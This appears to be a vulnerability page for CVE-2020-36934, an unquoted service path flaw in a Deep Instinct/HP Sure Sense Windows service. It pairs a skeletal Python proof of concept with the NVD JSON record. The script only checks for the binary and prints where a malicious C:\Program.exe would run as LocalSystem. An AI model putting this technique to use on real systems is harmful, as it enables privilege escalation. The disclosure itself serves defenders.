CVE-2020-36934

# CVE-2020-36934 PoC - Unquoted Service Path Exploitation # Target: DeepNetworkService.exe in C:\Program Files\HP Sure Sense\ # This PoC demonstrates how to exploit the unquoted service path vulnerability import os import sys import shutil import time def check_vulnerability(): """Check if the vulnerable service path exists""" service_path = r'C:\Program Files\HP Sure Sense\DeepNetworkService.exe' # Check if the service binary exists if os.path.exists(service_path): print(f"[+] Vulnerable service binary found: {service_path}") return True else: print(f"[-] Service binary not found") return False def create_malicious_executable(): """Create a malicious executable to be placed at unquoted path location""" # This would be the attacker's malicious payload # In real attack, this could be a reverse shell or other malware malicious_path = r'C:\Program.exe' # Create a simple executable (placeholder for actual malware) # The attacker would replace this with actual malicious code print(f"[*] Malicious executable would be placed at: {malicious_path}") print("[*] When DeepNetworkService starts, it may execute this file first") print("[*] The malicious code would run with LocalSystem privileges") return True def main(): print("="*60) print("CVE-2020-36934 - Unquoted Service Path Exploitation PoC") print("="*60) # Check if running with appropriate privileges if os.name == 'nt': try: import ctypes is_admin = ctypes.windll.shell32.IsUserAnAdmin() if not is_admin: print("[-] This exploit requires local user access") print("[-] Administrator privileges needed for full exploitation") except: pass if check_vulnerability(): create_malicious_executable() print("\n[!] Note: This is for educational purposes only") print("[!] Actual exploitation requires proper malware and persistence mechanism") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2020-36934", "sourceIdentifier": "[email protected]", "published": "2026-01-25T14:15:48.003", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Deep Instinct Windows Agent 1.2.24.0 contains an unquoted service path vulnerability in the DeepNetworkService that allows local users to potentially execute code with elevated privileges. Attackers can exploit the unquoted path in C:\\Program Files\\HP Sure Sense\\DeepNetworkService.exe to inject malicious code that would execute with LocalSystem permissions during service startup."}, {"lang": "es", "value": "Deep Instinct Windows Agent 1.2.24.0 contiene una vulnerabilidad de ruta de servicio sin comillas en el DeepNetworkService que permite a usuarios locales potencialmente ejecutar código con privilegios elevados. Los atacantes pueden explotar la ruta sin comillas en C:\\Program Files\\HP Sure Sense\\DeepNetworkService.exe para inyectar código malicioso que se ejecutaría con permisos de LocalSystem durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.deepinstinct.com/", "source": "[email protected]"}, {"url": "https://www.deepinstinct.com/2019/05/22/hp-collaborates-with-deep-instinct-to-roll-out-ai-powered-malware-protection-for-next-generation-hp-elitebook-and-zbook-pcs/", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49020", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/deep-instinct-windows-agent-deepnetworkservice-unquoted-service-path", "source": "[email protected]"}]}}